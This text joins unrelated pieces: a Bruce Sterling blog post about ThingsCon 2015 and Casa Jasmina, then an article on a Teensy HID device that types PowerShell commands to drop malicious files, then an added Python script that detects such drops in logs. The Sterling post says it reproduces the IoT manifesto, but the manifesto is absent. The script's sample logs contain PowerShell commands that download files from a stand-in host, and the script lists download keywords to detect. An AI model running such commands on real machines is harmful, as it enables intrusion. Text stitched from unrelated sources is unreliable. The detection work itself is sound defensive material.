In the case of the Internet of Things, there are many possible inputs — dozens of sensors of all kinds — but very limited outputs, because most IoT gizmos can only do very limited things to get any human attention: they blink, or beep, or vibrate. Blinking, beeping, vibrating things that demand human attention can get pretty annoying. Clearly this is a major IoT problem. Tina Aspiala recommends trying to think this situation through with some design perspective, instead of just hacking more components and attaching them to breadboards with soldering irons. That’s a point of view that makes some sense, though, let’s face it, people are gonna want to do it the easy way.

ThingsCon abounded in talks and workshops, more than I can describe here, but the most interesting thing on offer at ThingsCon 2015 was the “IoT Design Manifesto”. That’s why I’m placing the manifesto here in this post.


A manifesto is a sign of creative health. It’s not that I agree with the “IoT Design Manifesto” — on the contrary, if everybody agrees with a manifesto, then the manifesto is vapid and useless and hasn’t really said anything. Even a manifesto that’s completely wrong can be useful, because it motivates people to rebel and try something else. This manifesto is pretty good, in my opinion, because it’s kindly in tone and well-mannered, and it confronts quite a few of the IoT’s real problems.

Even the first declarations, one and two, “We don’t believe the hype, we design useful things,” single out the ThingsCon crowd as people who are skeptical and yet also trying to get something done. It’s a good attitude for a young industry. The other declarations are about participation, security, privacy, data collection, association, personal agency, sustainability and humanity. These are some big, hairy issues which aren’t going to get solved in anybody’s lifetime. However, if you spend your life with the Internet of Things you’re going to be dealing with situations of that kind all the time. So, might as well get used to that prospect now.

The authors of this IoT Manifesto are Andrew Spitz, Ruben van der Vleuten, Marcel Schouwenaar, Harm van Beek, Kevin Verelst, Anner Tiete, Jan Belon, Marcel van Heist and Holly Robbins. Before I went to ThingsCon I’d never heard of any of those people, but they were right to do what they did, and I’ll be watching them with a lot more interest from now on. People tend to grow by the size of their chosen problems. These people have some pretty big problems.

I closed the ThingsCon event by asking the people there to help us with our house.

It’s a bit scary to open the faucet in this way: we don’t know if we’ll get a huge flood, or just a groan in the pipe and some dripping. If we get a lot of interest, Casa Jasmina will be crowded and noisy; if interest is more modest, we’ll try to concentrate on a few core issues. In our Internet-of-Things house, we’ll have to acquire some things, accept some things, build some things and maybe commission some things, too. The project has started deliberately, we have paced ourselves, but as the months pass, Casa Jasmina will slowly become a unique and interesting place, a true place of difference.

I wondered, in starting this project, who would ever really want to stay in such a place, and, having been to ThingsCon, I now have a much better idea about that. ThingsCon had about 300 people attending it — the “new hardware movement” are not a mass movement of millions — but those three hundred people are real people. They are bright and committed, and they really exist. If we understand them as our natural guests and we try to please them, I think we’ll do well.

Bruce Sterling

Using HID Tricks to Drop Malicious Files

[Nikhil] has been experimenting with human interface devices (HID) in relation to security. We’ve seen in the past how HID can be exploited using inexpensive equipment. [Nikhil] has built his own simple device to drop malicious files onto target computers using HID technology.

The system runs on a Teensy 3.0. The Teensy is like a very small version of Arduino that has built-in functionality for emulating human interface devices, such as keyboards. This means that you can trick a computer into believing the Teensy is a keyboard. The computer will treat it as such, and the Teensy can enter keystrokes into the computer as though it were a human typing them. You can see how this might be a security problem.

[Nikhil’s] device uses a very simple trick to install files on a target machine. It simply opens up PowerShell and runs a one-liner command. Generally, this command will create a file based on input received from a web site controlled by the attacker. The script might download a trojan virus, or it might create a shortcut on the user’s desktop which will run a malicious script. The device can also create hot keys that will run a specific script every time the user presses that key.

Protecting against this type of attack can be difficult. Your primary option would be to strictly control USB devices, but this can be difficult to manage, especially in large organizations. Web filtering would also help in this specific case, since the attack relies on downloading files from the web. Your best bet might be to train users to not plug in any old USB device they find lying around. Regardless of the methodology, it’s important to know that this stuff is out there in the wild.
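Where USB devices cannot be locked down, the sequence described above (a new keyboard enumerates, then PowerShell fetches a file) can be looked for in endpoint telemetry. The sketch below is an added example, not code from [Nikhil] or the original post; the log format, host names, URLs, device IDs and the 30-second window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not real logs): "ISO-time host kind detail"
SAMPLE_LOG = """\
2024-05-06T09:14:02 ws-017 usb_attach class=HID-Keyboard vid=aaaa pid=0001
2024-05-06T09:14:05 ws-017 proc_start powershell.exe -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a','a.exe')"
2024-05-06T10:30:00 ws-022 usb_attach class=MassStorage vid=bbbb pid=0002
2024-05-06T10:30:04 ws-022 proc_start powershell.exe -c "Get-ChildItem"
2024-05-06T11:00:00 ws-031 usb_attach class=HID-Keyboard vid=cccc pid=0003
2024-05-06T11:20:00 ws-031 proc_start powershell.exe -c "Invoke-WebRequest http://example.invalid/b -OutFile b.ps1"
"""

# Assumption: injected keystrokes arrive within seconds of the device enumerating.
WINDOW = timedelta(seconds=30)
# Common PowerShell download primitives; extend to match local tooling.
DOWNLOAD = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|start-bitstransfer", re.I)
LINE = re.compile(r"^(\S+) (\S+) (usb_attach|proc_start) (.*)$")

def find_hid_drops(log_text, window=WINDOW):
    """Return (host, attach_time, command) for PowerShell download commands
    started within `window` of a new keyboard-class USB device on that host."""
    last_keyboard = {}  # host -> time of the most recent keyboard attach
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # ignore lines that are not in the constructed format
        ts, host, kind, detail = m.groups()
        when = datetime.fromisoformat(ts)
        if kind == "usb_attach":
            if "class=HID-Keyboard" in detail:
                last_keyboard[host] = when
        elif detail.lower().startswith("powershell"):
            attached = last_keyboard.get(host)
            recent = attached and timedelta(0) <= when - attached <= window
            if recent and DOWNLOAD.search(detail):
                alerts.append((host, attached.isoformat(), detail))
    return alerts

if __name__ == "__main__":
    for host, attached, cmd in find_hid_drops(SAMPLE_LOG):
        print(f"{host}: keyboard attached {attached}, then: {cmd}")
```

On the sample data only ws-017 is flagged: ws-022 attached a storage device and ran a benign command, and ws-031 ran its download twenty minutes after the keyboard appeared, which is outside the window.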

